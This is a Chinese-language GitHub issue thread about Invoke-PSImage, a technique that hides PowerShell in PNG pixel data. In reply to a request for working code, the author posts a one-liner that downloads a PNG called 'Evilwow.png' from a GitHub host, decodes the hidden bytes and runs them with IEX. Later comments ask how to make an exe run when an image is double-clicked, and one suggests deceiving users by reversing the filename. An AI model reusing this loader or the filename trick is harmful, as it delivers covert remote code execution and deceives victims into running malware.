### ISSUE TITLE
求修改后的源码

### ISSUE THREAD

**Issue by leezp** [3gstudent/feedback#27]
https://3gstudent.github.io/3gstudent.github.io/Invoke-PSImage%E5%88%A9%E7%94%A8%E5%88%86%E6%9E%90/

这篇文章 Invoke-PSImage 图片弹powershell, 生成的图片打开 调不起来powershell进程
百思不得其解，求指点，另求修改后的代码

**Comment by 3gstudent** [comment]
```
sal a New-Object;Add-Type -AssemblyName "System.Drawing";$g=a System.Drawing.Bitmap((a Net.WebClient).OpenRead("https://raw.githubusercontent.com/3gstudent/test/master/Evilwow.png"));$o=a Byte[] 500;(0..0)|%{foreach($x in(0..499)){$p=$g.GetPixel($x,$_);$o[$_*500+$x]=([math]::Floor(($p.B-band15)*16)-bor($p.G -band 15))}};IEX([System.Text.Encoding]::ASCII.GetString($o[0..13]))
```

**Comment by 3gstudent** [comment]
![123](https://user-images.githubusercontent.com/15814408/60776020-a3553e00-a0dd-11e9-8012-ff26aec370c5.png)

**Comment by leezp** [comment]
请问能否将exe程序放到png中，达到双击图片运行exe的效果？

**Comment by 3gstudent** [comment]
很难

**Comment by hex55** [comment]
> 请问能否将exe程序放到png中，达到双击图片运行exe的效果？

有一个办法，就是骗，利用文件名倒置
